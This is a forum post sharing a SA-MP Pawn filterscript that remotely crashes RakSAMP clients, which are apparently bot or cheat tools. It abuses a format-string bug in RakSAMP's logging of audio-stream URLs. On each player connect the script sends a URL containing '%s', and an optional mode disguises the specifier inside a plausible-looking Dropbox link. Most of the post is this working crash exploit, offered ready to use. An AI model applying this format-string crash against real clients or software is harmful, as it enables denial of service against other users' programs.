Slike ili Video: http://prntscr.com/kq94yy
Opis i dodatne informacije: Nadam se da ce nekom posluziti
Download link: DOLE
Scan link: //
Credits: SlowARG
Detaljnije:
http://forum.sa-mp.com/showthread.php?t=657987
#include
#define FILTERSCRIPT
#define _RAKCRASH_HIDE // Hide "%s" in "real URL".
/********************************************************************************
* How it works? *
* RakSAMP crashes when passing string format specifier in Log() function. *
* File: netrpc.cpp on ScrPlayAudioStream function: *
* Log(" %s", szURL); --> if szURL contains %s, it will crash *
* Since SA-MP client doesn't crash passing null string inside audio stream *
* we can abuse this to crash invalid clients such as RakSAMP. *
*********************************************************************************/
public OnPlayerConnect(playerid)
{
#if defined _RAKCRASH_HIDE
PlayAudioStreamForPlayer(playerid, "https://dl.dropboxusercontent.com/s/ac4oqi08gtiuzb0/intro%samp.mp3?dl=0"); // you can use any url containing %s or %20s or something else. It doesn't need to be a valid URL.
#else
PlayAudioStreamForPlayer(playerid, "%s");
#endif
StopAudioStreamForPlayer(playerid);
return 1;
}